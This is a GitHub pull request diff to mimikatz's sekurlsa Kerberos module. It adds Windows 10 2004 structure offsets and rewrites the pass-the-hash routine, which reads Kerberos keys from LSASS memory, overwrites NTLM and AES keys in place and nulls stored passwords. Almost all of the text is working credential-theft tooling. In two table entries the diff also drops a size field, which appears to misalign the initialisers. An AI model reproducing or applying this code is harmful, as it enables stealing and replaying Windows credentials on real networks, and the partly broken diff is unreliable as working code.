Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Resolving #322 - fixing KERB_HASHPASSWORD structures #323

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Resolving #322 - fixing KERB_HASHPASSWORD structures #323

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
157 changes: 109 additions & 48 deletions mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -21,6 +21,7 @@ KULL_M_PATCH_GENERIC KerberosReferences[] = {
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 5}},
{KULL_M_WIN_BUILD_10_1511, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 6}},
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 7}},
{KULL_M_WIN_BUILD_10_2004, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable },{0,NULL}, { 6, 8}},
};
#elif defined(_M_IX86)
BYTE PTRN_WALL_KerbReferenceLogonSession[] = {0x8b, 0x7d, 0x08, 0x8b, 0x17, 0x39, 0x50};
Expand Down Expand Up @@ -80,7 +81,9 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO_5, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_51, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password)
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, Checksump)
},
{
sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
Expand Down Expand Up @@ -117,7 +120,9 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO_5, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password)
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, Checksump)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
Expand Down Expand Up @@ -154,7 +159,9 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password)
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Checksump)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
Expand Down Expand Up @@ -192,6 +199,8 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Checksump)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
Expand Down Expand Up @@ -228,7 +237,8 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password)
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Checksump)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
Expand Down Expand Up @@ -265,7 +275,9 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, credentials) + FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0),
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0)
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Checksump)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
Expand Down Expand Up @@ -302,7 +314,8 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, credentials) + FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0),
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0)
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Checksump)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, LocallyUniqueIdentifier),
Expand Down Expand Up @@ -339,8 +352,49 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, credentials) + FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607, unkFunction),
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607, unkFunction)
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607, unkFunction),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Checksump)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, LocallyUniqueIdentifier),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, credentials),
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, Tickets_1),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, Tickets_2),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, Tickets_3),
},
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, SmartcardInfos),
sizeof(KIWI_KERBEROS_LOGON_SESSION_10_1607),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, ServiceName),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, TargetName),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, DomainName),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, TargetDomainName),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, Description),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, AltTargetDomainName),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, ClientName),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, TicketFlags),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, KeyType),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, Key),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, StartTime),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, EndTime),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, RenewUntil),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, TicketEncType),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, Ticket),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, TicketKvno),
sizeof(KIWI_KERBEROS_INTERNAL_TICKET_10_1607),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, pKeyList),
sizeof(KIWI_KERBEROS_KEYS_LIST_6),
FIELD_OFFSET(KERB_HASHPASSWORD_6_2004 , generic),
sizeof(KERB_HASHPASSWORD_6_2004),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspDataLength),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, credentials) + FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607, unkFunction),
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607, unkFunction),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC_2004,Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC_2004,Checksump)
}
};

KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package = {L"kerberos", kuhl_m_sekurlsa_enum_logon_callback_kerberos, TRUE, L"kerberos.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
Expand Down Expand Up @@ -468,10 +522,13 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
BOOL isNtlm = FALSE, isAes128 = FALSE, isAes256 = FALSE;
UNICODE_STRING nullPasswd = {0, 0, NULL};
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = {NULL, Localkerbsession.hMemory}, aLocalHashMemory = {NULL, Localkerbsession.hMemory}, aLocalNTLMMemory = {NULL, Localkerbsession.hMemory}, aLocalPasswdMemory = {&nullPasswd, Localkerbsession.hMemory}, aRemotePasswdMemory = {(PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetPasswordErase, RemoteLocalKerbSession.hMemory};
PKERB_HASHPASSWORD_GENERIC pHash;

PBYTE baseCheck;
PCWCHAR resultok;
SIZE_T offset;
DWORD* hashType=NULL;
SIZE_T* hashSize=NULL;
PBYTE* hashChecksump=NULL;

if(RemoteLocalKerbSession.address = *(PVOID *) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
{
Expand Down Expand Up @@ -504,6 +561,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY

RemoteLocalKerbSession.address = baseCheck = (PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
i = nbHash * (DWORD) kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;

if(aLocalHashMemory.address = LocalAlloc(LPTR, i))
{
if(kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i))
Expand All @@ -512,55 +570,58 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
for(i = 0, pthData->isReplaceOk = TRUE; (i < nbHash) && pthData->isReplaceOk; i++)
{
offset = i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric;
pHash = (PKERB_HASHPASSWORD_GENERIC) ((PBYTE) aLocalHashMemory.address + offset);
kprintf(L"\n \\_ %s ", kuhl_m_kerberos_ticket_etype(pHash->Type));

RemoteLocalKerbSession.address = pHash->Checksump;

hashType= (DWORD*)((PBYTE)aLocalHashMemory.address + offset );
hashSize = (SIZE_T*)((PBYTE)aLocalHashMemory.address + offset + kerbHelper[KerbOffsetIndex].offsetSize);
hashChecksump =(PBYTE*) ((PBYTE)aLocalHashMemory.address + offset + kerbHelper[KerbOffsetIndex].offsetChecksump);
kprintf(L"\n \\_ %s ", kuhl_m_kerberos_ticket_etype(*hashType));
RemoteLocalKerbSession.address = *hashChecksump;

resultok = L"OK";
if(isNtlm && ((pHash->Type != KERB_ETYPE_AES128_CTS_HMAC_SHA1_96) && (pHash->Type != KERB_ETYPE_AES256_CTS_HMAC_SHA1_96)) && (pHash->Size == LM_NTLM_HASH_LENGTH))
if(isNtlm && ((*hashType != KERB_ETYPE_AES128_CTS_HMAC_SHA1_96) && (*hashType != KERB_ETYPE_AES256_CTS_HMAC_SHA1_96)) && (*hashSize == LM_NTLM_HASH_LENGTH))
{
aLocalNTLMMemory.address = ntlmHash;
offset = LM_NTLM_HASH_LENGTH;
aLocalNTLMMemory.address = ntlmHash;
offset = LM_NTLM_HASH_LENGTH;
}
else if(isAes128 && (pHash->Type == KERB_ETYPE_AES128_CTS_HMAC_SHA1_96) && (pHash->Size == AES_128_KEY_LENGTH))
else if(isAes128 && (*hashType == KERB_ETYPE_AES128_CTS_HMAC_SHA1_96) && (*hashSize == AES_128_KEY_LENGTH))
{
aLocalNTLMMemory.address = aes128key;
offset = AES_128_KEY_LENGTH;
aLocalNTLMMemory.address = aes128key;
offset = AES_128_KEY_LENGTH;
}
else if(isAes256 && (pHash->Type == KERB_ETYPE_AES256_CTS_HMAC_SHA1_96) && (pHash->Size == AES_256_KEY_LENGTH))
else if(isAes256 && (*hashType == KERB_ETYPE_AES256_CTS_HMAC_SHA1_96) && (*hashSize == AES_256_KEY_LENGTH))
{
aLocalNTLMMemory.address = aes256key;
offset = AES_256_KEY_LENGTH;
aLocalNTLMMemory.address = aes256key;
offset = AES_256_KEY_LENGTH;
}
else
{
aLocalNTLMMemory.address = pHash;
RemoteLocalKerbSession.address = baseCheck + offset;
offset = FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, Checksump);
resultok = kuhl_m_kerberos_ticket_etype(KERB_ETYPE_NULL);
pHash->Type = KERB_ETYPE_NULL;
pHash->Size = 0;
kprintf(L"-> ");
aLocalNTLMMemory.address = hashType;
RemoteLocalKerbSession.address = baseCheck + offset;
offset = kerbHelper[KerbOffsetIndex].offsetChecksump;
resultok = kuhl_m_kerberos_ticket_etype(KERB_ETYPE_NULL);

*hashType= KERB_ETYPE_NULL;
*hashSize = 0;
kprintf(L"-> ");
}

if(pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, offset))
kprintf(L"%s", resultok);
kprintf(L"%s", resultok);
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
}

if(pthData->isReplaceOk)
{
kprintf(L"\n \\_ *Password replace @ %p (%u) -> ", aRemotePasswdMemory.address, (DWORD) kerbHelper[KerbOffsetIndex].passwordEraseSize);
if(aLocalPasswdMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].passwordEraseSize))
{
if(pthData->isReplaceOk = kull_m_memory_copy(&aRemotePasswdMemory, &aLocalPasswdMemory, kerbHelper[KerbOffsetIndex].passwordEraseSize))
kprintf(L"null");
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
LocalFree(aLocalPasswdMemory.address);
}
}
}

if(pthData->isReplaceOk)
{
kprintf(L"\n \\_ *Password replace @ %p (%u) -> ", aRemotePasswdMemory.address, (DWORD) kerbHelper[KerbOffsetIndex].passwordEraseSize);
if(aLocalPasswdMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].passwordEraseSize))
{
if(pthData->isReplaceOk = kull_m_memory_copy(&aRemotePasswdMemory, &aLocalPasswdMemory, kerbHelper[KerbOffsetIndex].passwordEraseSize))
kprintf(L"null");
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
LocalFree(aLocalPasswdMemory.address);
}
}
}
LocalFree(aLocalHashMemory.address);
}
}
Expand Down Expand Up @@ -636,13 +697,13 @@ void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION

if(!isNormalSessionKey)
{
kprintf(L"\n\t LSA Session Key : 0x%08x - %s", pKiwiTicket->KeyType, kuhl_m_kerberos_ticket_etype(pKiwiTicket->KeyType));
kprintf(L"\n\t LSA Session Key : 0x%08x - %s", pKiwiTicket->KeyType, kuhl_m_kerberos_ticket_etype(pKiwiTicket->KeyType));
if(pKiwiTicket->Key.Length <= (FIELD_OFFSET(LSAISO_DATA_BLOB, data) + (sizeof("KerberosKey") - 1) + AES_256_KEY_LENGTH)) // usual ISO DATA BLOB for Kerberos AES 256 session key
{
if(kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) pKiwiTicket->Key.Value, &lsaIsoKey.Value, &lsaIsoKey.Length))
{
kprintf(L"\n\t * Session Key : 0x%08x - %s", pKiwiTicket->KeyType, kuhl_m_kerberos_ticket_etype(pKiwiTicket->KeyType));
kprintf(L"\n\t ");
kprintf(L"\n\t * Session Key : 0x%08x - %s", pKiwiTicket->KeyType, kuhl_m_kerberos_ticket_etype(pKiwiTicket->KeyType));
kprintf(L"\n\t ");
kull_m_string_wprintf_hex(lsaIsoKey.Value, lsaIsoKey.Length, 0);
kuhl_m_kerberos_ticket_freeKiwiKerberosBuffer(&pKiwiTicket->Key);
pKiwiTicket->Key = lsaIsoKey;
Expand All @@ -657,7 +718,7 @@ void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION
if(BerApp_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(pKiwiTicket, FALSE))
{
if(kull_m_file_writeData(filename, BerApp_KrbCred->bv_val, BerApp_KrbCred->bv_len))
kprintf(L"\n\t * Saved to file %s !", filename);
kprintf(L"\n\t * Saved to file %s !", filename);
else PRINT_ERROR_AUTO(L"kull_m_file_writeData");
ber_bvfree(BerApp_KrbCred);
}
Expand Down Expand Up @@ -779,4 +840,4 @@ void kuhl_m_sekurlsa_kerberos_createKiwiKerberosBuffer(PKIWI_KERBEROS_BUFFER pBu
kull_m_memory_copy(&aLocalBuffer, &aBuffer, pBuffer->Length);
}
}
}
}
26 changes: 25 additions & 1 deletion mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -77,6 +77,8 @@ typedef struct _KERB_INFOS {

LONG offsetPasswordErase;
SIZE_T passwordEraseSize;
LONG offsetSize;
LONG offsetChecksump;
} KERB_INFOS, *PKERB_INFOS;

typedef struct _KERB_SMARTCARD_CSP_INFO_5 {
Expand Down Expand Up @@ -561,12 +563,25 @@ typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_10_1607 {
KIWI_KERBEROS_BUFFER Ticket;
} KIWI_KERBEROS_INTERNAL_TICKET_10_1607, *PKIWI_KERBEROS_INTERNAL_TICKET_10_1607;


typedef struct _KERB_HASHPASSWORD_GENERIC {
DWORD Type;
SIZE_T Size;
PBYTE Checksump;
} KERB_HASHPASSWORD_GENERIC, *PKERB_HASHPASSWORD_GENERIC;


#pragma pack(push, 1)
typedef struct _KERB_HASHPASSWORD_GENERIC_2004
{
DWORD Type;
SIZE_T Size;
PBYTE Checksump;
} KERB_HASHPASSWORD_GENERIC_2004 , *PKERB_HASHPASSWORD_GENERIC_2004 ;
#pragma pack(pop)



typedef struct _KERB_HASHPASSWORD_5 {
LSA_UNICODE_STRING salt; // http://tools.ietf.org/html/rfc3962
KERB_HASHPASSWORD_GENERIC generic;
Expand All @@ -585,6 +600,15 @@ typedef struct _KERB_HASHPASSWORD_6_1607 {
KERB_HASHPASSWORD_GENERIC generic;
} KERB_HASHPASSWORD_6_1607, *PKERB_HASHPASSWORD_6_1607;


typedef struct _KERB_HASHPASSWORD_6_2004 {
LSA_UNICODE_STRING salt; // http://tools.ietf.org/html/rfc3962
PVOID stringToKey; // AES Iterations (dword ?)
PVOID unk0;
DWORD unk1;
KERB_HASHPASSWORD_GENERIC_2004 generic;
} KERB_HASHPASSWORD_6_2004, *PKERB_HASHPASSWORD_6_2004;

typedef struct _KIWI_KERBEROS_KEYS_LIST_5 {
DWORD unk0; // dword_1233EC8 dd 4
DWORD cbItem; // debug048:01233ECC dd 5
Expand All @@ -606,4 +630,4 @@ typedef struct _KIWI_KERBEROS_KEYS_LIST_6 {
typedef struct _KIWI_KERBEROS_ENUM_DATA_TICKET {
BOOL isTicketExport;
BOOL isFullTicket;
} KIWI_KERBEROS_ENUM_DATA_TICKET, *PKIWI_KERBEROS_ENUM_DATA_TICKET;
} KIWI_KERBEROS_ENUM_DATA_TICKET, *PKIWI_KERBEROS_ENUM_DATA_TICKET;